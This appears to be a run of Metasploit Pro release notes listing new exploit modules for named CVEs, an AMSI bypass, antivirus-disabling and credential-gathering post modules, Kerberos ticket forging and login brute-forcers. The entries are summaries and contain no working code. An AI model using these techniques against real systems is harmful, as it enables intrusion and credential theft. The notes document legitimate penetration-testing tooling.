Adds support for module writers to supply a custom include_dirs array when using the MinGW library to compile payloads.
The ms15_034_http_sys_memory_dump.rb module has been updated to improve its handling of the check_host function so that the information about target exploitability is more accurate.
The script generated by the web_delivery module is blocked by the Antimalware Scan Interface (AMSI) on newer versions of windows. This PR includes an enhancement which allows the web_delivery module to bypass AMSI.
Reduces the size of PHP payloads such as php/reverse_php.
Adds a new post/test/all module which will run all available post/test modules against the open session.
A new mixin has been added to support detecting the architecture of the host OS on Windows systems. Support for other OSes will be added at a later date.
The grafana_plugin_traversal module has been updated to support beta and pre-release versions of Grafana.
The archer_c7_traversal module has been converted to a gather module and updated to include a check method so that users can appropriately check if a target is an Archer router or not.
This updates the LDAP server library to handle unbind requests.
This adds support to the auxiliary/admin/dcerpc/icpr_cert module to issue certificates for an explicit SID by specifying it within the NTDS_CA_SECURITY_EXT. This addition ensures that ESC1 will remain exploitable when issuing certificates with an SID becomes a requirement.
Adds supports for masm output format when generating payloads.
This PR updates Meterpreter's setg SessionTLVLogging true support to no longer truncate useful values such as payload UUIDs, file paths, executed commands etc.
Update test post modules to always have a clean, writable, and consistent test file system directory when running modules under the loadpath test/modules directory.
When running test modules that have been loaded by loadpath test/modules, any verbose printing logic generated will now be prefixed by the current test that is being run.
This PR updates unknown windows errors on python meterpreter to include original error code.
This adds Windows 10 revision number extraction to the Windows version Post API.
This PR updates the User Agent strings for June 2023.
This adds support for only running user specified test names in modules loaded by running loadpath test/modules.
This PR adds additional logging to the test/file module. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
This PR adds additional test/railgun_reverse_lookup tests for macOS and Linux.
Payload Enhancements:
The Metasploit Payloads gem has been bumped, bringing in several changes, such as the ability to change memory protections and query process memory on Python Meterpreter on Windows. Additionally, documentation on how to build and run the Java Meterpreter on a Mac has been updated, along with our README file, and some bugs were fixed.
Fixed:
Pro: Fixed issue with urls on web vulnerabilities index view.
Pro: We improved scaling support for exploring related modules in projects with large asset and vulnerability counts.
This fixes a bug where adding and deleting tags to multiple hosts was not functioning correctly.
Two bugs have been fixed in post/multi/manage/shell_to_meterpreter: one was caused by a lack of validation on the payload being used when using the PAYLOAD_OVERRIDE option to ensure the payload was valid, and one was caused by the module creating a handler but failing to pass the RHOST information along, causing the handler to run with an invalid configuration.
This fixes a Python's payload issue with Windows where it was failing due to bytes args is not allowed on Windows.
This PR updates Jenkins modules to work with newer versions. Previously they fell over with a CSRF failure and gave a false negative result.
Adds additional skip calls to the test/post modules to ensure that only relevant test expectations are run against the specified session without crashes.
This PR fixes the issue where an ArgumentError was thrown on the FETCH_SRVHOST option when running the info command when using a fetch payload.
This updates the post/multi/gather/aws_keys module to mark the platforms it is compatible with.
A bug has been fixed whereby command stager progress could go over 100%. This has now been fixed so that command stager progress should never go over 100%.
Fixes a bug that caused multi/manage/shell_to_meterpreter to not break when win_transfer=VBS was set.
A typo has been fixed in the exploits/multi/http/gitlab_github_import_rce_cve_2022_2992 module that prevent proper exception handling from occurring, and additional YARD documentation has been added for some related functions that were missing appropriate documentation on the exceptions they might throw.
This fixes a bug in the Windows Meterpreter's memory free API.
A bug has been fixed in the stdapi extension of Meterpreter when calling the stdapi_sys_process_memory_free command. This incorrectly handled memory, leading to a double free condition, which would crash Meterpreter. This has since been fixed.
The auxiliary/admin/kerberos/keytab EXPORT action will now consistently order exported entries.
Fixes an edgecase with windows/meterpreter/reverse_tcp where there was a small chance of an invalid stager being created.
This PR fixes Python Meterpreter sessions from crashing when extracting macOS network configuration when using the route or ipconfig commands.
Fix rex-text crashes when running ruby 3.3.
This PR fixes Python Meterpreter subprocess deadlock and file descriptor leak caused by the stdout/stderr file descriptors not being closed.
This PR fixes a Python Meterpreter macOS route command crash when ifconfig has a gateway name as a mac address separated by dots.
This PR adds a fix for false negatives on files not existing on windows python meterpreter.
This PR fixes the issue that falsely caused empty file reads on Meterpreter.
Fix bug when running the time command in msfconsole with complex commands.
Updates the test/services module to more consistently pass. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
This PR fixes an initialised constant error when meterpreter registry key reads timeout.
This PR fixes a symlink test bug when running python meterpreter on windows.
Fixes the broken test/extapi module. The module was facing issues returning clipboard data that pertained to the session being tested, this issue has been resolved. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
This PR reverts the changes from #17942 which was an improvement to AMSI bypass on new versions of windows. PR #17942 broke psexec and this PR reverts that issue.
Modules:
Adds a new rpyc_rce module to exploit CVE-2019-16328 and achieve remote command executionas the vulnerable server’s service user.
This adds an exploit module that leverages an authentication bypass to get remote code execution on PaperCut NG version 8.0.0 to 19.2.7 (inclusive), version 20.0.0 to 20.1.6 (inclusive), version 21.0.0 to 21.2.10 (inclusive) and version 22.0.0 to 22.0.8 (inclusive). This vulnerability is identified as CVE-2023-27350. Due to an improper access control in the SetupCompleted class, it is possible to bypass authentication and abuse the built-in scripting functionality for printers to obtain code execution as the SYSTEM user on Windows and the less privileged papercut user on Linux.
This adds an exploit for CVE-2023-21839 which is an unauthenticated RCE in Oracle Weblogic. Successful exploitation results in remote code execution as the oracle user.
This adds a command payload module that creates a new privileged user on a *nix target system.
This adds an exploit for CVE-2023-28771 which is a remote, unauthenticated OS command injection in IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the root user.
This adds an exploit module for CVE-2023-29084 which is an authenticated RCE in Zoho ManageEngine ADManager Plus. A remote attacker can leverage this vulnerability to execute OS commands by crafting a request to update the server's configuration. The modified configuration's value is restored by the exploit once it is completed. This exploit is incompatible with HTTP payloads due to the exploit modifying the HTTP proxy configuration of the server during exploitation.
This adds the post/windows/manage/make_token module which is capable of creating new tokens from known credentials and then setting them in a running instance of Meterpreter, which can allow that session to access resources it might not have previously been able to access.
This adds an exploit leverages an authenticated arbitrary file read on Github 16.0.0. This vulnerability is identified as CVE-2023-2825.
Add MIPS64 Linux Fetch Payloads.
This adds an exploit for TerraMaster NAS devices running TOS 4.x versions. The logic in include/makecvs.php permits shell metacharacters through the Event parameter in a GET request, permitting the upload of a webshell without authentication. Through this, an attacker can achieve remote code execution as the user running the TOS web interface.
This exploits a series of vulnerabilities including session crafting and command injection in TerraMaster NAS versions 4.2.15 and below to achieve unauthenticated RCE as the root user.
A module has been added for CVE-2023-1133, an unauthenticated .NET deserialization vulnerability in Delta Electronics InfraSuite Device Master versions below v1.0.5 in the ParseUDPPacket() method of the 'Device-Gateway-Status' process. Successful exploitation leads to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.
This PR adds a version scanner for Apache RocketMQ.
This adds an exploit for Symmetricom SyncServer appliances (S100-S300 series) vulnerable to an unauthenticated command injection in the hostname parameter in a request to the /controller/ping.php endpoint. The command injection vulnerability is patched in the S650 v2.2. Requesting the endpoint will result in a redirect to the login page; however, the command will still be executed, resulting in RCE as the root user.
This exploits an administrative password leak and command injection vulnerability on TerraMaster devices running TerraMaster Operating System (TOS) versions 4.2.29 and below to achieve unauthenticated RCE as the root user.
Adds a new module targeting the MOVEit Transfer web application that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.

New in Metasploit Pro 4.22.1 (June 05, 2023) (Jun 7, 2023)

New:
Pro - We added a new overview card that is displayed when a project has pending scheduled task chains.
Improved:
PR 17989 - The auxiliary/admin/kerberos/inspect_ticket and auxiliary/admin/kerberos/forge_ticket modules have been updated to visually represent the decoded binary values of the Kerberos ticket fields.
PR 18021 - The Powershell Post API methods use a mix of Powershell and .NET methods which have different ways of keeping track of the current working directory. This changes fixes the ambiguity by synchronizing the current working directory referenced by each set of methods.
PR 18031 - Updates edit and log commands to explain how to set LocalEditorand LocalPager so users can adjust the editor that is used when running the edit command or the log file that is used for logging module runtime information.
Fixed:
Pro - We fixes an issue with deleting credentials from a workspace.
PR 18009 - This PR updates the msfdb commands to no longer enable the web services as default. The web service will now be enabled with the web service flag: --msf-data-service <NAME>.
PR 18010 - Fix edgecase crash when running smb_login with Kerberos auth activated.
PR 18015 - Deletes a dead link from the Using Metasploit page.
PR 18019 - Fixes validation for the to_handler command when running Evasion and Payload modules.
PR 18024 - This PR fixes an issue with credentials being normalized to lowercase inconsistently, causing collisions with uppercase data. Relevant credentials are now automatically normalized to lowercase on insert and lookup.
PR 18026 - A bug has been fixed in test modules where not all modules were manipulating the load path to require the module_test library correctly, resulting on them being dependent on other modules correctly setting the load path, which may not always occur.
PR 18030 - A missing return statement was added into lib/msf/core/exploit/cmd_stager/http.rb to fix a Ruby syntax error when attempting to handle a 404 not found case.
PR 18032 - A bug has been fixed in the cmd/brace encoder where it did not appropriately escape braces.
PR 18036 - A typo has been fixed in the ibm_sametime_enumerate_users.rb gather module that prevented exceptions that were raised from being appropriately caught.
PR 18052 - The test/modules/post/test/file.rb module previously did not work on Windows sessions due to it reading data from a Linux only file to determine what data to write for the binary file write operation. This has since been fixed so that the binary data is randomly generated vs being based off an OS specific file.
Modules:
PR 17430 - This adds the ability for Metasploit to establish sessions to EC2 instances using Amazon's SSM interface. The result is an interactive shell that does not require the user to transfer a payload to the EC2 instance. For Windows targets, the shell is a a PTY enabled Powershell session that is incompatible with Post modules but supports user interaction.
PR 17899 - This adds a scanner module that leverages an authorization bypass in Dolibarr version 16, prior to 16.0.5. This module dumps the contact database to retrieve customer file, prospects, suppliers and employee information. No authentication is needed for this exploit.
PR 17929 - This adds an exploit for CVE-2023-22809, an LPE within sudoedit. The exploit currently only supports Ubuntu 22.04 and 22.10.
PR 17965 - This adds an auxiliary module that can create, read, update, and delete certificate template objects from Active Directory.
PR 18003 - This adds a scanner module that gather a specific file by leveraging a directory traversal vulnerability in TP-LINK Archer c7 routers. This vulnerability is identified as CVE-2015-3035.
PR 18004 - This PR adds an auxiliary for DOSing a VSFTPD server from version 2.3.2 and below.
PR 18025 - This PR adds a version scanner for Apache NiFi.
PR 18028 - A new scanner module has been added to scan for valid logins for Apache NiFi servers.

New in Metasploit Pro 4.22.1 (May 22, 2023) (May 24, 2023)

Improved:
Pro: We have updated the Java VM used for reporting to maintain a strong security posture.
PR 17060 - Updates the HTTP scanner modules with the functionality to log both HTTP requests and responses. This functionality can be enabled with set HTTPTrace true. This functionality is useful for debugging modules. In scenarios where the traffic is encrypted, for instance with WinRM, the logged values will be unencrypted.
PR 17807 - Adds documentation for Metasploit's folder structure, so that those unfamiliar with Metasploit can quickly get up to speed and understand where files might be located or where to place new files when developing content for Metasploit.
PR 17972 - Updates the example modules to align with the latest Metasploit framework module conventions.
PR 17985 - Fixes a typo in the post/windows/manage/sticky_keys module.
PR 17990 - Adds AutoCheck functionality and notes metadata to exploits/aix/local/ibstat_path.
PR 17991 - A default configuration file has been added in for Solargraph (from https://solargraph.org/), an language server that can help VS Code users and users of other code editors which might not have a language server built in obtain IntelliSense, inline documentation, and code completion functionality for Metasploit's code. For VS Code users, it is recommended to install the Solargraph plugin from https://marketplace.visualstudio.com/items?itemName=castwide.solargraph to take advantage of this change.
Fixed:
PR 17967 - Fix ruby 3.1 crashes and resource leaks when garbage collecting Meterpreter resources.
PR 17968 - A bug has been fixed where Certificate Templates were not being identified as vulnerable when there was an ACE that granted enrollment rights but did not correspond to any object types. The logic has now been updated so that only ACEs associated with an object that is neither the CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT right nor the CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT right will be ignored.
PR 17980 - This fixes the file system path check used by Powershell sessions.
PR 18005 - This PR fixes a crash when running a module through socks 4a proxy.
PR 18006 - This PR fixes an error when msfconsole opens browser links without a display present.
Modules:
PR 17133 - A new exploit module has been added which gains authenticated RCE on ManageEngine AdAudit builds 7005 and prior by creating a custom alert profile and leveraging the custom alert script component. On builds 7004 and later, CVE-2021-42847 is utilized to gain RCE via an arbitrary file write to create the necessary script for the alert profile.
PR 17782 - This adds a set of command payloads that facilitate fetching and executing a payload file from Metasploit.
PR 17881 - This adds a new exploit module that leverages multiple vulnerabilities in the zhttpd and zcmd binaries, which are present on more than 40 Zyxel routers and CPE devices, to achieve remote code execution as user supervisor. This chains a local file disclosure vulnerability that allows an unauthenticated attacker to read the configuration file and a weak password derivation algorithm vulnerability.
PR 17964 - A new module has been added which exploits Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x. To do this it first exploits CVE-2022-43939 to bypass authentication before then using CVE-2022-43769, a Server Side Template Injection (SSTI) vulnerability, to achieve unauthenticated code execution as the user running the Pentaho Business Analytics Server.
PR 17979 - A exploit has been added for CVE-2023-28128, an authenticated file upload vulnerability in versions below v6.4.0.186 of Ivanti Avalanche that allows authenticated administrators to change the default path to the web root of the applications, upload a JSP file, and achieve RCE as NT AUTHORITYSYSTEM. This occurs due to an bug whereby Ivanti Avalanche doesn't properly validate MS-DOS style short names in the configuration path.
PR 17993 - This module leverages a command injection vulnerability in the setuid invscout utility on AIX systems 7.2 and prior to achieve effective-uid root privileges.

New in Metasploit Pro 4.22.0 (April 11, 2023) (Apr 12, 2023)

Improved:
Pro: We added a warning to the report configuration view when a project does not contain the required data to generate a selected report.
Pro: Improved project members section of settings page.
PR 17458 - Updates the exploit/multi/misc/weblogic_deserialize_badattrval module to enable support for SSL/TLS.
PR 17724 - Updates the modules/auxiliary/admin/kerberos/forge_ticket.rb module with a new IncludeTicketChecksum option. When set to true the forged PAC will include the PAC_TICKET_CHECKSUM required in newer Windows AD implementations.
PR 17753 - Updates the auxiliary/admin/kerberos/get_ticket module to support using forged golden tickets. Users can now provide the Krb5Ccname option to supply the Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked for a valid TGT as normal.
PR 17789 - This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
PR 17813 - This sets the CHECK_FALSE option to true by default so that the auxiliary/scanner/ssh/ssh_enumusers scanner module will bail upon detecting false positive results.
PR 17833 - Updates the Metasploit RPC module.info command response to include whether or not the module supports a check method.
Fixed:
Pro: We improved task chain cloning to support when the original creator's user no longer exists.
PR 17704 - Fixes a crash in multi/http/solr_velocity_rce that was discovered when targeting a machine running Apache Solr 8.3.0 on Linux that required authentication.
PR 17778 - Updates the Metasploit database migration code to no longer break the test suite when running locally.
PR 17808 - Updates multiple broken Secunia references in modules with equivalent links found within Wayback Machine - a digital archive of the world wide web founded by the Internet Archive.
PR 17818 - This PR fixes a crash in the RPC job info command.
PR 17823 - This fixes an issue in the check method where targets with files containing no PHP code were falsely reported as safe.
PR 17825 - Fixes broken documentation references in the exploits/linux/local/zimbra_slapper_priv_esc module.
PR 17830 - Fixes a crash when parsing dates in ./tools/modules/committer_count.rb.
PR 17831 - Fixes broken documentation references in the exploits/aix/rpc_cmsd_opcode21.rb module.
PR 17835 - Fixes a bug in auxiliary/admin/networking/cisco_dcnm_auth_bypass where the bypass_auth method would break if a user supplied a TARGETURI path without a trailing /.
PR 17844 - Fixes broken documentation references in the secretsdump, zemra_panel_rce, and windows/gather/credentials/skype modules.
Modules:
PR 17785 - This adds an exploit for an authenticated .NET deserialization vulnerability that affects the SolarWinds Information Service (SWIS) component within SolarWinds. The SWIS component will deserialize messages received by the AMQP message queue, resulting in command execution as NT AUTHORITYSYSTEM.
PR 17806 - This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications.
PR 17826 - This PR adds an exploit module for CVE-2023-21768 that achieves local privilege escalation on Windows 11 2H22.
PR 17827 - This adds a scanner module that extracts version information from AMQP protocol servers.
PR 17828 - This adds a login scanner module for AMQP services.

New in Metasploit Pro 4.22.0 (March 27, 2023) (Mar 31, 2023)

Improved:
Pro: Improved errors on web terminal view when a session is disconnected.
PR 17401 - This PR adds a new x86 XOR polymorphic encoder.
PR 17583 - Enhances msfconsole's info -d command, which is used to generate browser Metasploit module documentation, to additionally include references to AttackerKB.
Fixed:
Pro: We improved import of credential files with NTLMHash values to ensure modules will identify entires in the expected format.
PR 17735 - Fixes a few incorrect parameter names in the generated developer documentation found at https://docs.metasploit.com/api/.
PR 17747 - Updates the wmap plugin to no longer crash when running wmap_targets -t http://metasploit.com.
PR 17783 - An update has been made to the reload_lib command so that it continues to reload files even if a single file fails to load.
PR 17784 - Reduces the amount of files loaded when msfconsole start up. This was a performance regression introduced by a recent Rails upgrade.
PR 17792 - Fix external module crash for when running the auxiliary/scanner/wproxy/att_open_proxy module.
PR 17794 - Update external modules to support python3.11.
PR 17798 - The debug --datastore command was previously causing a stacktrace due to some incorrect operations. These have since been fixed so that users can now use debug --datastore to output debug information along with the datastore information.
PR 17802 - Updates Python pingback payloads such as payload/python/pingback_reverse_tcp to no longer crash when viewing info or generating.
Modules:
PR 17388 - This PR adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models.
PR 17462 - This adds a post module that collects and decrypts credentials from WhatsUp Gold installs.
PR 17509 - This PR adds an exploit that targets a vulnerability in RedHat based systems where improper file permissions are applied to /usr/lib/tmpfiles.d/tomcat.conf for Apache Tomcat versions before 7.0.54-8.
PR 17750 - A new exploit has been added for CVE-2022-39952, a vulnerability in FortiNAC's keyUpload.jsp page which allows for arbitrary file write as an unauthenticated user. Successful exploitation results in unauthenticated RCE in the context of the root user, giving full control over the target device.
PR 17754 - This adds an exploit module for CVE-2022-24637, a single/double quote confusion vulnerability in Open Web Analytics versions below 1.7.4. This leads to the disclosure of sensitive information in an automatically generated PHP cache file, which can be leveraged to gain admin privileges and remote code execution.
PR 17771 - This adds a module that exploits an unauthenticated file upload vulnerability in various versions of Monitorr. RCE as the user under which the software runs can be achieved due to insufficient validation on GIF uploads.
PR 17775 - This adds an exploit module for CVE-2022-43781, an authenticated command injection vulnerability in various versions of Bitbucket. Arbitrary command execution is done by injecting specific environment variables into a user name and coercing Bitbucket application into generating a diff. This module requires at least admin credentials.

New in Metasploit Pro 4.22.0 (March 14, 2023) (Mar 15, 2023)

Improved:
Pro: We enhanced timeout handling for active auxiliary modules to log errors more gracefully.
Pro: Improved generation of reference links shown in module details and reports.
PR 17635 - Updates the admin/kerberos/inspect_ticket module to display the ticket checksum and full PAC checksum.
PR 17675 - Updates the admin/kerberos/forge_ticket to support a new extra_sids option which can be useful for including cross-domain SIDs for forging external Kerberos trust tickets as part of cross-trust domain escalation. The admin/kerberos/inspect_ticket has also been updated to support viewing these extra sid values.
PR 17686 - This adds 3 additional methods to the existing PetitPotam module to make it work even if the patch for CVE-2021-36942 has been installed. Note that it won't work after December 2021 patch.
PR 17699 - This adds SCHANNEL authentication support to LDAP modules.
PR 17715 - The Metasploit Payload gem has been bumped to 2.0.115, bringing in support for the arp command to Python Meterpreter on Linux, and adding support for displaying IPv6 routing tables using the route command on Windows.
PR 17727 - Two new options have been added to the login scanner library: max_consecutive_error_count and max_error_count. These options allow users to set the maximum number of errors that are allowed to occur when connecting as well as the maximum number of consecutive errors that are allowed when connecting before the login scanner will give up on a target.
PR 17744 - The code for msfconsole has been updated so that performance profiling can also take into account the time it takes to load msfenv and console related libraries, thereby allowing for more accurate performance profiling.
PR 17745 - This updates the metasploit-payloads gem to pull in changes to the Python Meterpreter on Windows to add the route add and delete functionality as well as process information.
PR 17746 - The data/wordlists/password.lst password list has been updated to include the master password that LastPass suggests as an example when a user goes to create a new master password, r50$K28vaIFiYxaY, into the password list, as well as to fix some encoding issues.
PR 17749 - Updates the auxiliary/admin/kerberos/keytab.rb module to additionally export any NTHASHES, which can be useful for decrypting Kerberos network traffic in wireshark.
PR 17756 - Updates secrets dump to generate the Kerberos rc4 key for the machine account.
PR 17757 - Updates the formatting logic for info command to improve the readability of the module description. Previously, the module description was squashed into a single line, but now each paragraph and bullet list etc will be rendered on their own new lines.
Fixed:
Pro: Improved enforcement of SSL settings for globally configure SMTP.
PR 17562 - This fixes some incorrect Railgun definitions for the wldap32 Windows library.
PR 17673 - lib/msf/core/payload/apk.rb has been updated so that by default it only decompiles the main classes instead of all classes, fixing some issues whereby decompiling all classes would prevent creation of a backdoored APK. This also bumps up the minimum apktool version to 2.4.1 and makes it so that versions prior to 2.7.0 of apktool will throw a warning about being potentially out of date.
PR 17679 - This PR fixes the broken payload selection for Metasploit RPC.
PR 17696 - The version of Metasploit Payloads in use by Metasploit has been bumped, which brings in support for the getprivs and getdesktop commands to Python Meterpreters running on Windows, and also adds support for getting the handle of processes opened via the session. Additionally, fixes were made to support Python 2.5 and to fix the getdesktop output of Python Meterpreters.
PR 17697 - This updates the exploit/linux/http/froxlor_log_path_rce module to note that Foxlor 2.0.7 is the last vulnerable version.
PR 17700 - The argument validation for the route command has been reworked to improve the way it validates arguments and to print out more accurate error messages.
PR 17716 - A bug has been fixed whereby the reverse port forward information message was displayed incorrectly, and the same information was shown on both the local and remote parts of the message.
PR 17721 - This fixes an issue where payloads that were adapted failed when stage encoding was enabled because the stage encoding was based on the stager arch and platform values. These values were always the same until we introduced adapted payloads, which can vary.
PR 17723 - A bug has been fixed in the modules/encoders/php/base64.rb encoder whereby strings were being passed as literal strings without being properly quoted, which could result in errors on newer versions of PHP.
PR 17726 - The Metasploit Payloads gem has been updated bringing in initial support for attaching to processes on Python Meterpreter shells on Windows, a bug fix for the route command on newer versions of Windows on Windows Meterpreter, and a fix so that both C Meterpreter and Python Meterpreter sessions will attempt to enable the same set of permissions when running getprivs.
PR 17729 - Fixes an edge case crash when running Ruby 3.2.
PR 17738 - Fix Ruby 3.2 crash when running certain tools.
PR 17758 - The metasploit-payloads gem has been bumped to fix a token handle leak that was causing Python Meterpreters to leave dangling handles after using getprivs, fix a error in packet_transmit_http whereby error codes were not appropriately returned, and update the arp command to properly return the interface name instead of the index for the Interface column.
PR 17774 - A bug has been fixed when displaying the Metasploit banner due to use of an undefined function; this has been updated to use the proper function.
Modules:
PR 17507 - A module has been added which exploits CVE-2023-22952, a RCE vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. Successful exploitation as an unauthenticated attacker will result in remote code execution as the user running the web services, which is typically www-data.
PR 17624 - This pull request adds an exploit module for an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through to 12.2.11, which results in remote code execution.
PR 17638 - This adds a module to execute code using Lucee's scheduled job functionality. The feature requires authentication by default and allows a ColdFusion page to be rendered which is used to execute an OS command using the cfexecte directive. The module works on both Linux and Windows targets.
PR 17672 - This PR includes post module that will disable ClamAV on Linux systems.
PR 17676 - This adds a login module for the Softing Secure Integration Server software.
PR 17733 - This adds a login scanner module to brute force credentials of Wowza Streaming Engine Manager.

New in Metasploit Pro 4.22.0 (February 27, 2023) (Mar 1, 2023)

New in Metasploit Pro 4.22.0 (January 30, 2023) (Feb 1, 2023)

Improved:
Pro: We completed dependency updates required to support the latest Metasploit Framework version 6.3.
Pro: We completed a periodic update of the Java Runtime to maintain a good security posture.
PR 16685 - Updates the Kerberos Authentication support to include multiple new encryption types, which will allow Kerberos Authentication to work against newer targets that have older encryption types disabled.
PR 16689 - Adds support for host addresses in kerberos tickets.
PR 16700 - Updates LDAP modules to support Kerberos and NTLM authentication.
PR 16749 - Adds Kerberos Authentication support to WinRM modules.
PR 16760 - Updates WinRM sessions to support delegated Kerberos tickets, to be able to access additional network resources from the compromised server.
PR 16770 - This enables the reuse of previously obtained CCache files for MSSQL, SMB, WinRM, and LDAP authentication. After a successful authentication using Kerberos, tickets are stored in CCache files. They will be reused for subsequent authentications without having to renegotiate new Kerberos tickets.
PR 17025 - Adds a new USER_RID option to the Kerberos ticket forging module auxiliary/admin/kerberos/forge_ticket.
PR 17340 - The Python Meterpreter has been updated to warn that the bind information is ignored when a reverse port forward is created to prevent confusion when this information is supplied by a user.
PR 17343 - This makes performance improvements to the windows/local/unquoted_service_path module.
PR 17373 - Adds ticket flags when presenting krb5 ccaches on msfconsole.
PR 17374 - Adds klist command support to list Kerberos tickets in the database.
PR 17451 - This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
PR 17456 - This PR adds a new KrbOfferedEncryptionTypes option that allows users to configure what encryption types are used with the KDC.
PR 17466 - This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
PR 17473 - Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
PR 17475 - Enables the datastore_fallbacks feature flag by default. This is a rewrite of Metasploit's datastore to fix multiple bugs and edge-cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again.
PR 17480 - A new alias has been added for payloads called exploit which will perform the same action as to_handler, to help users familiar with exploit modules to use the same familiar exploit method to open handlers when using payloads.
PR 17518 - A new adapter has been added to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.
PR 17519 - Improves the SMTP delivery error handling for the auxiliary/client/smtp/emailer module.
PR 17526 - Updates the show options and show advanced command to visually group options with the same conditions together, such as options that require an action or datastore value to be set.
PR 17535 - This adds NTLM hash recover to the kerberos/get_ticket module.
PR 17539 - Adds additional error handling for Kerberos error codes.
Fixed:
Pro: We addressed CVE-2023-0599, a stored XSS vulnerability on the individual host services page reported by Michael Caruso. Thank you for the coordinated disclosure.
Pro: We improved the CLI startup process to ensure running tasks are no longer interrupted by starting a Pro console.
PR 17385 - This PR fixes the file write and file append methods to return the expected Boolean values rather than nil.
PR 17455 - Fixes an issue where Kerberos responses could not be received in smaller chunks, such as in bandwidth restricted networks.
PR 17482 - Fixes a connection issue with reverse_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
PR 17491 - A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.
PR 17497 - This fixes an error where modules that issue certificates (icpr_cert and now auxiliary/admin/dcerpc/cve_2022_26923_certifried) would crash if the response from the server was that the certificate was submitted and no certificate was returned. This updates the code to check if the certificate is present before attempting to process it.
PR 17516 - The version of metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
PR 17525 - Fixes a deprecation warning when using socks proxy support in Metasploit.
PR 17541 - Fixes a crash that occurs when domain option is set to blank.
PR 17549 - Updates the inspect_ticket module to output a user friendly error if the ticket decryption has failed, i.e. due to an invalid decryption key.
Modules:
PR 16625 - Adds a new scanner/kerberos/kerberos_login module for bruteforcing and verifying credentials against a Kerberos server. Accounts which do not require preauthnetication, i.e. AS-REP Roastable accounts, will have the hashes output for offline cracking.
PR 17348 - This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.
PR 17407 - This adds an exploit that targets various versions of Cacti network-monitoring software. For versions 1.2.22 and below, there exists an unauthenticated command injection vulnerability in remote_agent.php that when exploited, will result in remote code execution as the user running the Cacti server.
PR 17449 - A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.
PR 17479 - This adds an exploit module that leverages an unauthenticated SQLi against Wordpress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves Wordpress usernames and password hashes using Time-Based Blind SQL Injection technique.
PR 17533 - Enhances the auxiliary/admin/kerberos/get_ticket module with PKINIT functionality.

New in Metasploit Pro 4.21.1 July 1 (Jul 8, 2022)

New in Metasploit Pro 4.21.1 June 24 (Jun 28, 2022)

New in Metasploit Pro 4.21.0 May 9 (May 12, 2022)

New in Metasploit Pro 4.21.0 April 26 (Apr 28, 2022)

New in Metasploit Pro 4.21.0 April 13 (Apr 18, 2022)

Improved:
Pro: We expanded the error messages that return when duplicate emails are added to social engineering target lists with conflicting user detail.
PR 15972 - This updates the log4shell scanner with the LEAK_PARAMS option, which provides a way to leak more target information such as environment variables.
PR 16320 - This updates Windows Meterpreter payloads to support a new MeterpreterDebugBuild datastore option. When set to true the generated payload will have additional logging support which is visible via Window's DbgView program.
PR 16373 - This adds initial support for ruby 3.1.
PR 16403 - This adds more checks to the post/windows/gather/checkvm module to better detect if the current target is a Qemu / KVM virtual machine.
Fixed:
PR 16364 - This adds a fix for a crash in auxiliary/spoof/dns/native_spoofer as well as documentation for the module.
PR 16386 - This Ensures Exploit::Remote::SocketServer does not call the associated Rex::ServiceManager service wait method if the service has already stopped.
PR 16398 - A number of recent payload adds did not conform to the patterns used for suggesting spec configurations. Tests for these payloads have now been manually added to ensure they will be appropriately tested as part of rspec checks.
PR 16408 - This fixes an edgecase with the multi/postgres/postgres_copy_from_program_cmd_exec module, which would crash when a randomly generated table name started with a number.
PR 16419 - A bug has been fixed whereby when using the search command and searching by disclosure_date, the help menu should instead appear. This has been fixed by improving the date handling logic for the search command.
Modules:
PR 16082 - This updates the shadow_mitm_dispatcher module by adding a new RubySMB Dispatcher. This allows a better integration with RubySMB and enables the use of all the features provided by its client. Also, both SMBv2 and SMBv3 are now supported.
PR 16381 - This adds a post module that enumerates applications installed with Chocolatey on Windows systems.
PR 16382 - This adds an exploit for CVE-2022-26904, which is an LPE vulnerability affecting Windows 7 through Windows 11. Leveraging this vulnerability can allow a local attacker running as a standard user, who has knowledge of another standard user's credentials, to execute code as NT AUTHORITYSYSTEM. ThePromptOnSecureDesktop setting must also be set to 1 on the affected machine for this exploit to work, which is the default setting.
PR 16395 - This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to 3.1.7 and 3.2.3.
